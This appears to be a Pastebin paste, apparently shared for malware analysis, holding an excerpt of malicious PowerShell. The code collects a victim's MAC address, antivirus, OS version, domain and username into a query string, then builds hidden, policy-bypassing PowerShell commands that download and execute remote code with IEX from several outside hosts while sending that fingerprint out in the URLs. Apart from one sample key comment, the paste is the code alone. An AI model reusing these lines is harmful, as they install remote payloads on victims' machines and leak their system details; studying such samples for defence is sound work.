Advertisement
dissectmalware

Malicious PowerShell (Excerpt)

Aug 2nd, 2019
780
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $key = "&mac="+$mac+"&av="+$av+"&version="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME + "&PS=" + $psflag
  2.  
  3. #Sample Key:
  4. #mac=00-0C-29-AA-AB-32&av=Windows Defender&version=10.0.14393&bit=64-bit&flag2=False&domain=WORKGROUP&user=user&PS=True
  5.  
  6. $Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?h" + $dt + "')"
  7. $Text = "IEX (New-Object Net.WebClient).downloadstring('http://v.y6h.net/g?l" + $dt + "')"
  8. $download = 'http://27.102.107.137/status.json?allv6' + $key + "&" + $status + "&" + $MyInvocation.MyCommand.Definition
  9. $onps = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/newol.dat?allv6" + $key + "')" + '"'
  10. $dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d64.dat?allv6" + $key + "')" + '"'
  11. $dglink = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.bddp.net/d32.dat?allv6" + $key + "')" + '"'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement